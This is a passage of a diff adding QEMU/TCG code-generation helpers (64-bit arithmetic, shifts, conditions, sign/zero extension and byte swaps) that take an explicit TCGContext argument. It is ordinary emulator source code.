(cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + tcg_gen_op6ii_i32(s, INDEX_op_brcond2_i32, + TCGV_LOW(arg1), TCGV_HIGH(arg1), TCGV_LOW(arg2), + TCGV_HIGH(arg2), cond, label_index); + } +} + +static inline void tcg_gen_setcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i32(s, TCGV_LOW(ret), 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i32(s, TCGV_LOW(ret), 0); + } else { + tcg_gen_op6i_i32(s, INDEX_op_setcond2_i32, TCGV_LOW(ret), + TCGV_LOW(arg1), TCGV_HIGH(arg1), + TCGV_LOW(arg2), TCGV_HIGH(arg2), cond); + } + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_mul_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + TCGv_i64 t0; + TCGv_i32 t1; + + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i32(s); + + if (TCG_TARGET_HAS_mulu2_i32) { + tcg_gen_op4_i32(s, INDEX_op_mulu2_i32, TCGV_LOW(t0), TCGV_HIGH(t0), + TCGV_LOW(arg1), TCGV_LOW(arg2)); + /* Allow 
the optimizer room to replace mulu2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + tcg_debug_assert(TCG_TARGET_HAS_muluh_i32); + tcg_gen_op3_i32(s, INDEX_op_mul_i32, TCGV_LOW(t0), + TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_op3_i32(s, INDEX_op_muluh_i32, TCGV_HIGH(t0), + TCGV_LOW(arg1), TCGV_LOW(arg2)); + } + + tcg_gen_mul_i32(s, t1, TCGV_LOW(arg1), TCGV_HIGH(arg2)); + tcg_gen_add_i32(s, TCGV_HIGH(t0), TCGV_HIGH(t0), t1); + tcg_gen_mul_i32(s, t1, TCGV_HIGH(arg1), TCGV_LOW(arg2)); + tcg_gen_add_i32(s, TCGV_HIGH(t0), TCGV_HIGH(t0), t1); + + tcg_gen_mov_i64(s, ret, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i32(s, t1); +} + +static inline void tcg_gen_div_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_div_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_rem_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_rem_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_divu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_divu_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_remu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_remu_i64(s, ret, arg1, arg2); +} + +#else + +static inline void tcg_gen_mov_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (!TCGV_EQUAL_I64(ret, arg)) + tcg_gen_op2_i64(s, INDEX_op_mov_i64, ret, arg); +} + +static inline void tcg_gen_movi_i64(TCGContext *s, TCGv_i64 ret, int64_t arg) +{ + tcg_gen_op2i_i64(s, INDEX_op_movi_i64, ret, arg); +} + +static inline void tcg_gen_ld8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld8u_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld8s_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + 
tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld16u_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld16s_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld32u_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld32s_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld_i64, ret, arg2, offset); +} + +static inline void tcg_gen_st8_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st8_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_st16_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st16_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_st32_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st32_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_st_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_add_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_add_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_sub_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_sub_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_and_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCGV_EQUAL_I64(arg1, arg2)) { + 
tcg_gen_mov_i64(s, ret, arg1); + } else { + tcg_gen_op3_i64(s, INDEX_op_and_i64, ret, arg1, arg2); + } +} + +static inline void tcg_gen_andi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2) +{ + TCGv_i64 t0; + /* Some cases can be optimized here. */ + switch (arg2) { + case 0: + tcg_gen_movi_i64(s, ret, 0); + return; + case 0xffffffffffffffffull: + tcg_gen_mov_i64(s, ret, arg1); + return; + case 0xffull: + /* Don't recurse with tcg_gen_ext8u_i64. */ + if (TCG_TARGET_HAS_ext8u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext8u_i64, ret, arg1); + return; + } + break; + case 0xffffu: + if (TCG_TARGET_HAS_ext16u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext16u_i64, ret, arg1); + return; + } + break; + case 0xffffffffull: + if (TCG_TARGET_HAS_ext32u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext32u_i64, ret, arg1); + return; + } + break; + } + t0 = tcg_const_i64(s, arg2); + tcg_gen_and_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); +} + +static inline void tcg_gen_or_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCGV_EQUAL_I64(arg1, arg2)) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + tcg_gen_op3_i64(s, INDEX_op_or_i64, ret, arg1, arg2); + } +} + +static inline void tcg_gen_ori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* Some cases can be optimized here. */ + if (arg2 == -1) { + tcg_gen_movi_i64(s, ret, -1); + } else if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_or_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_xor_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCGV_EQUAL_I64(arg1, arg2)) { + tcg_gen_movi_i64(s, ret, 0); + } else { + tcg_gen_op3_i64(s, INDEX_op_xor_i64, ret, arg1, arg2); + } +} + +static inline void tcg_gen_xori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* Some cases can be optimized here. 
*/ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else if (arg2 == -1 && TCG_TARGET_HAS_not_i64) { + /* Don't recurse with tcg_gen_not_i64. */ + tcg_gen_op2_i64(s, INDEX_op_not_i64, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_xor_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_shl_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_shl_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_shli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_shl_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_shr_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_shr_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_shri_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_shr_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_sar_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_sar_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_sari_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_sar_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_brcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 arg1, + TCGv_i64 arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + tcg_gen_op4ii_i64(s, INDEX_op_brcond_i64, arg1, arg2, cond, label_index); + } +} + +static inline void tcg_gen_setcond_i64(TCGContext *s, 
TCGCond cond, TCGv_i64 ret, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i64(s, ret, 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i64(s, ret, 0); + } else { + tcg_gen_op4i_i64(s, INDEX_op_setcond_i64, ret, arg1, arg2, cond); + } +} + +static inline void tcg_gen_mul_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_mul_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_div_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_div_i64) { + tcg_gen_op3_i64(s, INDEX_op_div_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_sari_i64(s, t0, arg1, 63); + tcg_gen_op5_i64(s, INDEX_op_div2_i64, ret, t0, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_div_i64(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_rem_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rem_i64) { + tcg_gen_op3_i64(s, INDEX_op_rem_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_div_i64, t0, arg1, arg2); + tcg_gen_mul_i64(s, t0, t0, arg2); + tcg_gen_sub_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_sari_i64(s, t0, arg1, 63); + tcg_gen_op5_i64(s, INDEX_op_div2_i64, t0, ret, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_rem_i64(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_divu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_div_i64) { + tcg_gen_op3_i64(s, INDEX_op_divu_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_movi_i64(s, t0, 0); + tcg_gen_op5_i64(s, INDEX_op_divu2_i64, ret, t0, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + 
gen_helper_divu_i64(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_remu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rem_i64) { + tcg_gen_op3_i64(s, INDEX_op_remu_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_divu_i64, t0, arg1, arg2); + tcg_gen_mul_i64(s, t0, t0, arg2); + tcg_gen_sub_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_movi_i64(s, t0, 0); + tcg_gen_op5_i64(s, INDEX_op_divu2_i64, t0, ret, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_remu_i64(s, ret, arg1, arg2); + } +} +#endif /* TCG_TARGET_REG_BITS == 32 */ + +static inline void tcg_gen_addi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_add_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_subfi_i64(TCGContext *s, TCGv_i64 ret, int64_t arg1, TCGv_i64 arg2) +{ + TCGv_i64 t0 = tcg_const_i64(s, arg1); + tcg_gen_sub_i64(s, ret, t0, arg2); + tcg_temp_free_i64(s, t0); +} + +static inline void tcg_gen_subi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_sub_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} +static inline void tcg_gen_brcondi_i64(TCGContext *s, TCGCond cond, TCGv_i64 arg1, + int64_t arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_brcond_i64(s, cond, arg1, t0, label_index); + tcg_temp_free_i64(s, t0); + } +} + +static inline void 
tcg_gen_setcondi_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 arg1, int64_t arg2) +{ + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_setcond_i64(s, cond, ret, arg1, t0); + tcg_temp_free_i64(s, t0); +} + +static inline void tcg_gen_muli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_mul_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); +} + + +/***************************************/ +/* optional operations */ + +static inline void tcg_gen_ext8s_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext8s_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext8s_i32, ret, arg); + } else { + tcg_gen_shli_i32(s, ret, arg, 24); + tcg_gen_sari_i32(s, ret, ret, 24); + } +} + +static inline void tcg_gen_ext16s_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext16s_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext16s_i32, ret, arg); + } else { + tcg_gen_shli_i32(s, ret, arg, 16); + tcg_gen_sari_i32(s, ret, ret, 16); + } +} + +static inline void tcg_gen_ext8u_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext8u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext8u_i32, ret, arg); + } else { + tcg_gen_andi_i32(s, ret, arg, 0xffu); + } +} + +static inline void tcg_gen_ext16u_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext16u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext16u_i32, ret, arg); + } else { + tcg_gen_andi_i32(s, ret, arg, 0xffffu); + } +} + +/* Note: we assume the two high bytes are set to zero */ +static inline void tcg_gen_bswap16_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_bswap16_i32) { + tcg_gen_op2_i32(s, INDEX_op_bswap16_i32, ret, arg); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + + tcg_gen_ext8u_i32(s, t0, arg); + tcg_gen_shli_i32(s, t0, t0, 8); + tcg_gen_shri_i32(s, ret, arg, 8); + tcg_gen_or_i32(s, ret, ret, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void 
tcg_gen_bswap32_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_bswap32_i32) { + tcg_gen_op2_i32(s, INDEX_op_bswap32_i32, ret, arg); + } else { + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + + tcg_gen_shli_i32(s, t0, arg, 24); + + tcg_gen_andi_i32(s, t1, arg, 0x0000ff00); + tcg_gen_shli_i32(s, t1, t1, 8); + tcg_gen_or_i32(s, t0, t0, t1); + + tcg_gen_shri_i32(s, t1, arg, 8); + tcg_gen_andi_i32(s, t1, t1, 0x0000ff00); + tcg_gen_or_i32(s, t0, t0, t1); + + tcg_gen_shri_i32(s, t1, arg, 24); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +#if TCG_TARGET_REG_BITS == 32 +static inline void tcg_gen_ext8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext8s_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ext16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext16s_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ext32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ext8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext8u_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ext16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext16u_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ext32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_trunc_shr_i64_i32(TCGContext *s, TCGv_i32 ret, TCGv_i64 arg, + unsigned int count) +{ + tcg_debug_assert(count < 64); + if (count >= 32) 
{ + tcg_gen_shri_i32(s, ret, TCGV_HIGH(arg), count - 32); + } else if (count == 0) { + tcg_gen_mov_i32(s, ret, TCGV_LOW(arg)); + } else { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_shri_i64(s, t, arg, count); + tcg_gen_mov_i32(s, ret, TCGV_LOW(t)); + tcg_temp_free_i64(s, t); + } +} + +static inline void tcg_gen_extu_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), arg); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ext_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), arg); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +/* Note: we assume the six high bytes are set to zero */ +static inline void tcg_gen_bswap16_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); + tcg_gen_bswap16_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); +} + +/* Note: we assume the four high bytes are set to zero */ +static inline void tcg_gen_bswap32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); + tcg_gen_bswap32_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); +} + +static inline void tcg_gen_bswap64_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + + tcg_gen_bswap32_i32(s, t0, TCGV_LOW(arg)); + tcg_gen_bswap32_i32(s, t1, TCGV_HIGH(arg)); + tcg_gen_mov_i32(s, TCGV_LOW(ret), t1); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), t0); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); +} +#else + +static inline void tcg_gen_ext8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext8s_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext8s_i64, ret, arg); + } else { + tcg_gen_shli_i64(s, ret, arg, 56); + tcg_gen_sari_i64(s, ret, ret, 56); + } +} + +static inline void tcg_gen_ext16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext16s_i64) { + tcg_gen_op2_i64(s, 
INDEX_op_ext16s_i64, ret, arg); + } else { + tcg_gen_shli_i64(s, ret, arg, 48); + tcg_gen_sari_i64(s, ret, ret, 48); + } +} + +static inline void tcg_gen_ext32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext32s_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext32s_i64, ret, arg); + } else { + tcg_gen_shli_i64(s, ret, arg, 32); + tcg_gen_sari_i64(s, ret, ret, 32); + } +} + +static inline void tcg_gen_ext8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext8u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext8u_i64, ret, arg); + } else { + tcg_gen_andi_i64(s, ret, arg, 0xffu); + } +} + +static inline void tcg_gen_ext16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext16u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext16u_i64, ret, arg); + } else { + tcg_gen_andi_i64(s, ret, arg, 0xffffu); + } +} + +static inline void tcg_gen_ext32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext32u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext32u_i64, ret, arg); + } else { + tcg_gen_andi_i64(s, ret, arg, 0xffffffffu); + } +} + +static inline void tcg_gen_trunc_shr_i64_i32(TCGContext *s, TCGv_i32 ret, TCGv_i64 arg, + unsigned int count) +{ + tcg_debug_assert(count < 64); + if (TCG_TARGET_HAS_trunc_shr_i32) { + tcg_gen_op3i_i32(s, INDEX_op_trunc_shr_i32, ret, + MAKE_TCGV_I32(GET_TCGV_I64(arg)), count); + } else if (count == 0) { + tcg_gen_mov_i32(s, ret, MAKE_TCGV_I32(GET_TCGV_I64(arg))); + } else { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_shri_i64(s, t, arg, count); + tcg_gen_mov_i32(s, ret, MAKE_TCGV_I32(GET_TCGV_I64(t))); + tcg_temp_free_i64(s, t); + } +} + +/* Note: we assume the target supports move between 32 and 64 bit + registers */ +static inline void tcg_gen_extu_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_ext32u_i64(s, ret, MAKE_TCGV_I64(GET_TCGV_I32(arg))); +} + +/* Note: we assume the target supports move between 32 and 64 bit + registers */ +static inline void 
tcg_gen_ext_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_ext32s_i64(s, ret, MAKE_TCGV_I64(GET_TCGV_I32(arg))); +} + +/* Note: we assume the six high bytes are set to zero */ +static inline void tcg_gen_bswap16_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_bswap16_i64) { + tcg_gen_op2_i64(s, INDEX_op_bswap16_i64, ret, arg); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + + tcg_gen_ext8u_i64(s, t0, arg); + tcg_gen_shli_i64(s, t0, t0, 8); + tcg_gen_shri_i64(s, ret, arg, 8); + tcg_gen_or_i64(s, ret, ret, t0); + tcg_temp_free_i64(s, t0); + } +} + +/* Note: we assume the four high bytes are set to zero */ +static inline void tcg_gen_bswap32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_bswap32_i64) { + tcg_gen_op2_i64(s, INDEX_op_bswap32_i64, ret, arg); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + + tcg_gen_shli_i64(s, t0, arg, 24); + tcg_gen_ext32u_i64(s, t0, t0); + + tcg_gen_andi_i64(s, t1, arg, 0x0000ff00); + tcg_gen_shli_i64(s, t1, t1, 8); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 8); + tcg_gen_andi_i64(s, t1, t1, 0x0000ff00); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 24); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_bswap64_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_bswap64_i64) { + tcg_gen_op2_i64(s, INDEX_op_bswap64_i64, ret, arg); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + + tcg_gen_shli_i64(s, t0, arg, 56); + + tcg_gen_andi_i64(s, t1, arg, 0x0000ff00); + tcg_gen_shli_i64(s, t1, t1, 40); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_andi_i64(s, t1, arg, 0x00ff0000); + tcg_gen_shli_i64(s, t1, t1, 24); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_andi_i64(s, t1, arg, 0xff000000); + tcg_gen_shli_i64(s, t1, t1, 8); + tcg_gen_or_i64(s, t0, t0, t1); + + 
